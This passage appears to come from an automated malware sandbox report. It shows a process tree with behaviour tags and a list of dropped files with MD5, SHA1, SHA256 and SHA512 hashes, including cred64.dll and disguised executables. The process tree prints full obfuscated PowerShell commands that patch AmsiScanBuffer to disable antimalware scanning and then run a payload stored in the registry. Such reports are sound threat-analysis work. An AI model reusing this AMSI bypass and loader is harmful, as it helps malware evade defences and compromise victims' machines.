@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ypxibQaSjud=$aSicYtFBkgxUm.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$tPOIokMJfiSkLH=$bFzVnGZjWDzqhJ.Invoke($Null,@([Object]$ypxibQaSjud,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+''+[Char](76)+'i'+'b'+'ra'+[Char](114)+''+[Char](121)+'A')));$NNLJUjhtlKcGkSWAX=$bFzVnGZjWDzqhJ.Invoke($Null,@([Object]$ypxibQaSjud,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$kxiFgQW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tPOIokMJfiSkLH,$tskFyZtaUuAObHUJZdb).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$jVjODYWauBcwDwvei=$bFzVnGZjWDzqhJ.Invoke($Null,@([Object]$kxiFgQW,[Object]('A'+[Char](109)+''+[Char](115)+'i'+[Char](83)+'canBu'+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$ROgXNsZTnz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NNLJUjhtlKcGkSWAX,$luBWublazzLOQDBjXrmdow).Invoke($jVjODYWauBcwDwvei,[uint32]8,4,[ref]$ROgXNsZTnz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$jVjODYWauBcwDwvei,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NNLJUjhtlKcGkSWAX,$luBWublazzLOQDBjXrmdow).Invoke($jVjODYWauBcwDwvei,[uint32]8,0x20,[ref]$ROgXNsZTnz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+'ler'+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                                              2⤵
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:4016
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                  PID:4356
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PbqyqEBGqpoW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xQMlShcwNnhCbr,[Parameter(Position=1)][Type]$WXGfhIfcut)$ncnDXmHlRTd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+'l'+[Char](101)+''+'c'+''+'t'+''+[Char](101)+'d'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+'T'+'yp'+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+'C'+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$ncnDXmHlRTd.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+'e'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$xQMlShcwNnhCbr).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$ncnDXmHlRTd.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+'H'+''+'i'+''+'d'+''+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+'l'+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$WXGfhIfcut,$xQMlShcwNnhCbr).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+'i'+'m'+'e'+''+','+''+'M'+''+[Char](97)+'nag'+'e'+''+[Char](100)+'');Write-Output $ncnDXmHlRTd.CreateType();}$FTHemIQwZLJQH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+'em.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('Mic'+[Char](114)+'o'+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](70)+''+[Char](84)+''+[Char](72)+''+[Char](101)+'m'+'I'+''+[Char](81)+''+[Char](119)+'ZL'+[Char](74)+'Q'+[Char](72)+'');$LulXAPrPoYZJma=$FTHemIQwZLJQH.GetMethod(''+[Char](76)+''+[Char](117)+''+[Char](108)+''+'X'+''+[Char](65)+''+[Char](80)+''+[Char](114)+''+'P'+''+[Char](111)+''+[Char](89)+''+'Z'+'J'+[Char](109)+''+[Char](97)+'',[Reflection.BindingFlags]'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eMinDXQnorpKkZYpBrs=PbqyqEBGqpoW @([String])([IntPtr]);$lRWQjFvYVCetyICpHrpHLx=PbqyqEBGqpoW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cthcTjNmmJI=$FTHemIQwZLJQH.GetMethod(''+[Char](71)+'e'+[Char](116)+'M'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$PjIliYJsSzdCgv=$LulXAPrPoYZJma.Invoke($Null,@([Object]$cthcTjNmmJI,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+'b'+'rary'+'A'+'')));$zlmLaPvMjSYnSPyCw=$LulXAPrPoYZJma.Invoke($Null,@([Object]$cthcTjNmmJI,[Object](''+'V'+'i'+[Char](114)+'tu'+'a'+''+'l'+''+'P'+''+'r'+''+[Char](111)+''+[Char](116)+'e'+'c'+''+'t'+'')));$JTwPSqb=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PjIliYJsSzdCgv,$eMinDXQnorpKkZYpBrs).Invoke(''+'a'+''+'m'+''+'s'+'i.d'+[Char](108)+''+[Char](108)+'');$iXbMViEfVuGBPRgdx=$LulXAPrPoYZJma.Invoke($Null,@([Object]$JTwPSqb,[Object](''+[Char](65)+''+'m'+''+'s'+'i'+[Char](83)+'c'+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$swxoAmigoR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zlmLaPvMjSYnSPyCw,$lRWQjFvYVCetyICpHrpHLx).Invoke($iXbMViEfVuGBPRgdx,[uint32]8,4,[ref]$swxoAmigoR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iXbMViEfVuGBPRgdx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zlmLaPvMjSYnSPyCw,$lRWQjFvYVCetyICpHrpHLx).Invoke($iXbMViEfVuGBPRgdx,[uint32]8,0x20,[ref]$swxoAmigoR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+'a'+''+'l'+''+[Char](101)+''+'r'+''+'s'+''+'t'+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                                                2⤵
                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                PID:4620
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  3⤵
                                                                                                                                    PID:4236
                                                                                                                                • C:\Users\Admin\PLocktime\nvndrivesllapi.exe
                                                                                                                                  C:\Users\Admin\PLocktime\nvndrivesllapi.exe
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  PID:3856
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                                                                                                                                1⤵
                                                                                                                                  PID:784
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
                                                                                                                                  1⤵
                                                                                                                                    PID:932
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
                                                                                                                                    1⤵
                                                                                                                                      PID:748
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      1⤵
                                                                                                                                        PID:1248
                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                        C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                        PID:3956

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5D4.tmp.csv
                                                                                                                                        Filesize

                                                                                                                                        34KB

                                                                                                                                        MD5

                                                                                                                                        ddc7bc0f2b67aff326b642e581e00539

                                                                                                                                        SHA1

                                                                                                                                        c9a4b0ca59a51c0dccccdbb53c3e9ae3684bf528

                                                                                                                                        SHA256

                                                                                                                                        b3ad4f3f98b06347516e43d4af5e880c84fad7623afde9af8a428a17e5013801

                                                                                                                                        SHA512

                                                                                                                                        9549eb6af1efccbd9e85901c9203efa698e80b285cdf06066fa48bd7c1767279849790947078870ab57565cb5a5b8c68de6287f177ae9022ec147cbb3c4caddd

                                                                                                                                        Download Submit

                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5E4.tmp.csv
                                                                                                                                        Filesize

                                                                                                                                        34KB

                                                                                                                                        MD5

                                                                                                                                        f58ac070d4660b23e8a8cad839b4a731

                                                                                                                                        SHA1

                                                                                                                                        45c6389c3787cd8055e82da882c238fac8d04523

                                                                                                                                        SHA256

                                                                                                                                        54f75ac36902edb1b63ab8852e8d11fe6b174095fea7f1e88fcd8798d6f279b0

                                                                                                                                        SHA512

                                                                                                                                        7237c4a26afb55880cf4cd547848f48f237c8f3749bf874349c9f13fb74e0c7e1f18bd4f40993b4622b8e0ad14b53076913a8613e67b06c6a6e3fff9e784e9e0

                                                                                                                                        Download Submit

                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERC605.tmp.txt
                                                                                                                                        Filesize

                                                                                                                                        12KB

                                                                                                                                        MD5

                                                                                                                                        4895ba7bcacf40b2545bf6bb6a1b136c

                                                                                                                                        SHA1

                                                                                                                                        d49f19f7a75e4ca92283213ccd2d38de2c233db3

                                                                                                                                        SHA256

                                                                                                                                        aa02fa0cc00061eb16eec7b468274bbdc78a24ea483478f74424fe5e95501369

                                                                                                                                        SHA512

                                                                                                                                        b1e857ec313629904598bd835784492cc95f612408987f7b561b96d7920d73cadafd479e9f7fcc5831e9982c03b6009c7077b7166a1913c6760d4c1248ddbf3c

                                                                                                                                        Download Submit

                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERC606.tmp.txt
                                                                                                                                        Filesize

                                                                                                                                        12KB

                                                                                                                                        MD5

                                                                                                                                        6013be2c4af36bcc6498e015a1e2752c

                                                                                                                                        SHA1

                                                                                                                                        61849b968afc5cdba6fe1f51f168d2f08159acf7

                                                                                                                                        SHA256

                                                                                                                                        d4c72d2b9f603ed97f4577162b4bfec6a8944a8c54b313c8f0c67d8f79465501

                                                                                                                                        SHA512

                                                                                                                                        97c590e65bec5a8ea39ec222c7f0fae451511097f55b52e9fea37d9b67ee1bafa09cd99b01523176e07f1386c121218eab59ea73fa0b3f74b00f258cf3d52c28

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\1000003062\syncfiles.dll
                                                                                                                                        Filesize

                                                                                                                                        3.8MB

                                                                                                                                        MD5

                                                                                                                                        bfdb08a3922a436009e70c93b4336cda

                                                                                                                                        SHA1

                                                                                                                                        c29c5331047cfd8db374338e77cb5d676b2e9ccc

                                                                                                                                        SHA256

                                                                                                                                        29662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2

                                                                                                                                        SHA512

                                                                                                                                        fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                        Filesize

                                                                                                                                        3KB

                                                                                                                                        MD5

                                                                                                                                        ad5cd538ca58cb28ede39c108acb5785

                                                                                                                                        SHA1

                                                                                                                                        1ae910026f3dbe90ed025e9e96ead2b5399be877

                                                                                                                                        SHA256

                                                                                                                                        c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                                                                                                                                        SHA512

                                                                                                                                        c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        e869c5dc5a599d23a0039c545de695f9

                                                                                                                                        SHA1

                                                                                                                                        b4fe398c90ffd42d444d0bd3bcd47b877ba1110e

                                                                                                                                        SHA256

                                                                                                                                        6320ac5f5bd42a4d2b7e527aa54f7c76b996f4ddd6e41ef307c2aaf0769d8e21

                                                                                                                                        SHA512

                                                                                                                                        fc4e20995058a78b1f3582041c7cc7578b4a6c979e82a3d0e161477649e533a3627b46825d2f386dabfbc5e3e5851b8826ffdb767a30f2d807c8692c90faa574

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        2eb385ba461049b7fed827c70177e82d

                                                                                                                                        SHA1

                                                                                                                                        2a03cfd835d492a6e70e7fb92587e974ef3ffd2b

                                                                                                                                        SHA256

                                                                                                                                        af9f11d6535825243aad3d7b93d27e89a042c0482b7142ce04a16e67feef1f13

                                                                                                                                        SHA512

                                                                                                                                        35d4cb7922982fcbc528040ec76e0cb97b1e7c43a8e7052d123186cd5a4bdedc20c1e1259b57704fb821f6c3973c91936488e79f855019e22b5c4f3f40314f0c

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000004001\avicapn32.exe
                                                                                                                                        Filesize

                                                                                                                                        5.7MB

                                                                                                                                        MD5

                                                                                                                                        cc320704a370f208678f46083de6115b

                                                                                                                                        SHA1

                                                                                                                                        e51aefe7d64cb2b461e570c8475338cd51b9295f

                                                                                                                                        SHA256

                                                                                                                                        08ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2

                                                                                                                                        SHA512

                                                                                                                                        95aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000004001\avicapn32.exe
                                                                                                                                        Filesize

                                                                                                                                        5.7MB

                                                                                                                                        MD5

                                                                                                                                        cc320704a370f208678f46083de6115b

                                                                                                                                        SHA1

                                                                                                                                        e51aefe7d64cb2b461e570c8475338cd51b9295f

                                                                                                                                        SHA256

                                                                                                                                        08ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2

                                                                                                                                        SHA512

                                                                                                                                        95aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe
                                                                                                                                        Filesize

                                                                                                                                        8.8MB

                                                                                                                                        MD5

                                                                                                                                        78592d915e780eb7c445a3f797a5c6d1

                                                                                                                                        SHA1

                                                                                                                                        c11cb328c94cff87b033086369fa3cbdf445e265

                                                                                                                                        SHA256

                                                                                                                                        01b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b

                                                                                                                                        SHA512

                                                                                                                                        15fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe
                                                                                                                                        Filesize

                                                                                                                                        8.8MB

                                                                                                                                        MD5

                                                                                                                                        78592d915e780eb7c445a3f797a5c6d1

                                                                                                                                        SHA1

                                                                                                                                        c11cb328c94cff87b033086369fa3cbdf445e265

                                                                                                                                        SHA256

                                                                                                                                        01b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b

                                                                                                                                        SHA512

                                                                                                                                        15fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
                                                                                                                                        Filesize

                                                                                                                                        5.5MB

                                                                                                                                        MD5

                                                                                                                                        dcded7ac014d98160a90789c615ae3cf

                                                                                                                                        SHA1

                                                                                                                                        e1f14ffa121e6618aaa5760c91d129503f7656da

                                                                                                                                        SHA256

                                                                                                                                        7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

                                                                                                                                        SHA512

                                                                                                                                        fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
                                                                                                                                        Filesize

                                                                                                                                        5.5MB

                                                                                                                                        MD5

                                                                                                                                        dcded7ac014d98160a90789c615ae3cf

                                                                                                                                        SHA1

                                                                                                                                        e1f14ffa121e6618aaa5760c91d129503f7656da

                                                                                                                                        SHA256

                                                                                                                                        7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

                                                                                                                                        SHA512

                                                                                                                                        fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
                                                                                                                                        Filesize

                                                                                                                                        5.5MB

                                                                                                                                        MD5

                                                                                                                                        dcded7ac014d98160a90789c615ae3cf

                                                                                                                                        SHA1

                                                                                                                                        e1f14ffa121e6618aaa5760c91d129503f7656da

                                                                                                                                        SHA256

                                                                                                                                        7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

                                                                                                                                        SHA512

                                                                                                                                        fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
                                                                                                                                        Filesize

                                                                                                                                        5.5MB

                                                                                                                                        MD5

                                                                                                                                        dcded7ac014d98160a90789c615ae3cf

                                                                                                                                        SHA1

                                                                                                                                        e1f14ffa121e6618aaa5760c91d129503f7656da

                                                                                                                                        SHA256

                                                                                                                                        7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

                                                                                                                                        SHA512

                                                                                                                                        fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe
                                                                                                                                        Filesize

                                                                                                                                        7.2MB

                                                                                                                                        MD5

                                                                                                                                        d121a0468485d70b575e278d407bb76e

                                                                                                                                        SHA1

                                                                                                                                        aa632a96db84885afe0175cfaafbb7317d5fb0ac

                                                                                                                                        SHA256

                                                                                                                                        4f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325

                                                                                                                                        SHA512

                                                                                                                                        59c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe
                                                                                                                                        Filesize

                                                                                                                                        7.2MB

                                                                                                                                        MD5

                                                                                                                                        d121a0468485d70b575e278d407bb76e

                                                                                                                                        SHA1

                                                                                                                                        aa632a96db84885afe0175cfaafbb7317d5fb0ac

                                                                                                                                        SHA256

                                                                                                                                        4f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325

                                                                                                                                        SHA512

                                                                                                                                        59c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                                                        Filesize

                                                                                                                                        822.9MB

                                                                                                                                        MD5

                                                                                                                                        44dd3b7591d98ccba2a6bb3a07c005bf

                                                                                                                                        SHA1

                                                                                                                                        9ca3b82d234f3a25110e6e5e0151dfad183319a4

                                                                                                                                        SHA256

                                                                                                                                        1919a06dfe762f0957818926406ba401cd5c7c09810a9364ee8e9a4649833e3c

                                                                                                                                        SHA512

                                                                                                                                        e0d02e357f05d3812b2c26bd6f9353da6055d604bca7fa532dcd2fb278c8de1a3e255a0feb9e442e0de2d4c074637d8b67a177763b587b123f19f48d9e734df9

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                                                        Filesize

                                                                                                                                        822.9MB

                                                                                                                                        MD5

                                                                                                                                        44dd3b7591d98ccba2a6bb3a07c005bf

                                                                                                                                        SHA1

                                                                                                                                        9ca3b82d234f3a25110e6e5e0151dfad183319a4

                                                                                                                                        SHA256

                                                                                                                                        1919a06dfe762f0957818926406ba401cd5c7c09810a9364ee8e9a4649833e3c

                                                                                                                                        SHA512

                                                                                                                                        e0d02e357f05d3812b2c26bd6f9353da6055d604bca7fa532dcd2fb278c8de1a3e255a0feb9e442e0de2d4c074637d8b67a177763b587b123f19f48d9e734df9

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll
                                                                                                                                        Filesize

                                                                                                                                        5.0MB

                                                                                                                                        MD5

                                                                                                                                        24ece515d8082af9bbf326e17e9f0670

                                                                                                                                        SHA1

                                                                                                                                        9b7e8e37f2a27ee3c92835873e446686e6f0a723

                                                                                                                                        SHA256

                                                                                                                                        8c0ea747424ac83b2392463cdd6d244a62cc3e0557476b5140e035c26e41bcbe

                                                                                                                                        SHA512

                                                                                                                                        e1428917fd7e6643cbc2c561007164edfa7bb8599ffa736d4fdf2bf49b618101eb7a14c79bd250ede9a2a0afa0affe43194a3ace111b4c7c43d29a7e18f9a0e2

                                                                                                                                        Download Submit

                                                                                                                                      • C:\Users\Admin\PLocktime\nvndrivesllapi.exe
                                                                                                                                        Filesize

                                                                                                                                        8.8MB

                                                                                                                                        MD5

                                                                                                                                        78592d915e780eb7c445a3f797a5c6d1

                                                                                                                                        SHA1

                                                                                                                                        c11cb328c94cff87b033086369fa3cbdf445e265

                                                                                                                                        SHA256

                                                                                                                                        01b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b

                                                                                                                                        SHA512

                                                                                                                                        15fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5

                                                                                                                                        Download Submit

                                                                                                                                      • \Users\Admin\1000003062\syncfiles.dll
                                                                                                                                        Filesize

                                                                                                                                        3.8MB

                                                                                                                                        MD5

                                                                                                                                        bfdb08a3922a436009e70c93b4336cda

                                                                                                                                        SHA1

                                                                                                                                        c29c5331047cfd8db374338e77cb5d676b2e9ccc

                                                                                                                                        SHA256

                                                                                                                                        29662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2

                                                                                                                                        SHA512

                                                                                                                                        fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e

                                                                                                                                        Download Submit

                                                                                                                                      • \Users\Admin\1000003062\syncfiles.dll
                                                                                                                                        Filesize

                                                                                                                                        3.8MB

                                                                                                                                        MD5

                                                                                                                                        bfdb08a3922a436009e70c93b4336cda

                                                                                                                                        SHA1

                                                                                                                                        c29c5331047cfd8db374338e77cb5d676b2e9ccc

                                                                                                                                        SHA256

                                                                                                                                        29662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2

                                                                                                                                        SHA512

                                                                                                                                        fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e

                                                                                                                                        Download Submit

                                                                                                                                      • \Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll
                                                                                                                                        Filesize

                                                                                                                                        5.0MB

                                                                                                                                        MD5

                                                                                                                                        24ece515d8082af9bbf326e17e9f0670

                                                                                                                                        SHA1

